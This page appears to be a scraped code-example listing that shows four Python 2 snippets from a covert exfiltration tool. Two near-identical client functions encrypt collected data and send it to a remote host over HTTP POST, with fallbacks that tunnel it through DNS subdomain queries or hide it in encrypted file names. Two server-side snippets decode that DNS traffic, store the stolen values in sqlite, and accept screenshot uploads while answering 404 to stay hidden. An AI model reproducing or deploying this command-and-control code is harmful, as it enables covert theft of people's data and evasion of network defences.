Exemplo n.º 1
0
def send_data(result, target, key, host, network_avail, dns_avail):
    #
    if network_avail:
        encrypted = translateMessage(result, key, 'encrypt')
        data = urlencode({'d': encrypted, 's': host})
        try:
            u = urllib2.urlopen('http://' + target + url_end, data)
            u.request('POST', url_end, data)
        except:
            pass
    elif dns_avail:
        # dns data
        iter = result.split('|')
        for i in iter:
            try:
                regex = re.compile(r"\W+")
                name = regex.sub("-", i)
                if len(name) > 1:
                    rec_split(name, key, host, target, subdomain)
            except:
                pass

    else:
        iter = result.split('|')
        for i in iter:
            try:
                regex = re.compile(r"\W+")
                name = regex.sub("-", i)
                open(translateMessage(name, key, 'encrypt'), 'a').close()
            except:
                pass
Exemplo n.º 2
0
def send_data(result, target, key, host, network_avail, dns_avail):
    #
    if network_avail:  
        encrypted = translateMessage(result, key, 'encrypt')
        data = urlencode({'d':encrypted, 's':host})
        try:
            u = urllib2.urlopen('http://' + target + url_end, data)
            u.request('POST', url_end, data)
        except:
            pass
    elif dns_avail:
        # dns data
        iter = result.split('|')
        for i in iter:
            try:
                regex = re.compile(r"\W+")
                name = regex.sub("-", i)
                if len(name) > 1:
                    rec_split(name, key, host, target,subdomain)
            except:
                pass
            
    else:
        iter = result.split('|')
        for i in iter:
            try:
                regex = re.compile(r"\W+")
                name = regex.sub("-", i)
                open(translateMessage(name, key, 'encrypt'), 'a').close()
            except:
                pass
Exemplo n.º 3
0
    #else:
    #    udps.bind(('',53))
    while 1:
        try:
             
           data, addr = udps.recvfrom(1024)
           p=DNSQuery(data)

           if p.domain.find(target) > -1 :
                 udps.sendto(p.response(ip), addr)
                 print 'Response: %s -> %s' % (p.domain, ip)                 
                 fullinfo, domain = p.domain.split(target)
                 print (fullinfo)
                 fullinfo = fullinfo.replace("'","")
                 info, session,temp, temp2 = fullinfo.split('.')            
                 decrypted = translateMessage(info,key,'decrypt')
                 type, value = decrypted.split('-',1)
                 print (type,value)
                 type = type.upper()
                 con = sqlite3.connect(dbfile)
                 cur = con.cursor()  
                 try:               
                     cur.execute("INSERT INTO data (sessionid, type, value, requestdate, ip) VALUES(?,?,?,?,?)", 
                         (session,type.upper(),value,str(datetime.datetime.utcnow()), str(addr[0])))
                     con.commit()
                 except sqlite3.IntegrityError:
                     print("Ierr")
                     if con:
                         try:
                             con.close()
                         except:
Exemplo n.º 4
0
 def do_POST(self):
     if None != re.search( url_end +'*', self.path):
         ip = self.client_address[0]
         length = int(self.headers['Content-Length'])
         post_data = urlparse.parse_qs(self.rfile.read(length).decode('utf-8'))
         session = ""
         info = ""
         for key1, value in post_data.iteritems():
             if key1 == 'd':                
                 #print(value)
                 decrypted = translateMessage(value[0],key,'decrypt')
                 info_array = decrypted.split('|')
             if key1 == 's':                
                 #print(value)
                 session = value[0]
 
         for info in info_array: 
             type=''
             value2=''     
             try:
                 if len(info)>3:
                     type, value2 = info.split(' ',1)                
                     regex = re.compile(r"\W+")
                     value = regex.sub("-",value2.strip())
                     print (type,value)
             except:
                 with open(logfile, "a") as myfile: 
                     traceback.print_exc(file=myfile)
                     myfile.write("Info: " + info)
                 traceback.print_exc()
                 print("info: " + info)
                 continue
             try:
                 con = sqlite3.connect(dbfile)
             except OperationalError:
                 with open(logfile, "a") as myfile: 
                     traceback.print_exc(file=myfile) 
                 time.sleep(1)
                 con = sqlite3.connect(dbfile)
             cur = con.cursor()  
             try:
                 if len(value)>0:               
                     cur.execute("INSERT INTO data (sessionid, type, value, requestdate, ip) VALUES(?,?,?,?,?)", 
                             (session,type.upper(),value,str(datetime.datetime.utcnow()), str(ip)))
             except sqlite3.IntegrityError:
                 con.close()
                 continue
             con.commit()
             if con:
                 con.close()
         try:
             os.chdir(work_dir)
         except:
             pass
         return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
     
     if None != re.search(url_screenshot_end + '*', self.path):
         try:
             try:
                 os.chdir(work_dir)
             except:
                 pass
             #os.chdir('..')
             ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))     
 
             if ctype == 'multipart/form-data' :     
                 # using cgi.FieldStorage instead, see 
                 # http://stackoverflow.com/questions/1417918/time-out-error-while-creating-cgi-fieldstorage-object     
                 fs = cgi.FieldStorage( fp = self.rfile, 
                                        headers = self.headers, # headers_, 
                                        environ={ 'REQUEST_METHOD':'POST' } # all the rest will come from the 'headers' object,     
                                        # but as the FieldStorage object was designed for CGI, absense of 'POST' value in environ     
                                        # will prevent the object from using the 'fp' argument !     
                                      )
                 ## print 'have fs'
                 #pprint(fs)
             else: raise Exception("Unexpected POST request")                   
             fs_up = fs.list[0]
             
             fullname = os.path.join(CWD, fs_up.filename)
             try:
                 if not os.path.exists(fullname):
                  with open(fullname, 'wb') as o:
                      # self.copyfile(fs['upfile'].file, o)
                      o.write( fs_up.file.read() ) 
             except:
                 pass         
             self.send_response(404)
             self.end_headers()
             
         except Exception as e:
             # pass
             with open(logfile, "a") as myfile: 
                 traceback.print_exc(file=myfile)
             traceback.print_exc()
             self.send_error(404,'POST to "%s" failed: %s' % (self.path, str(e)) )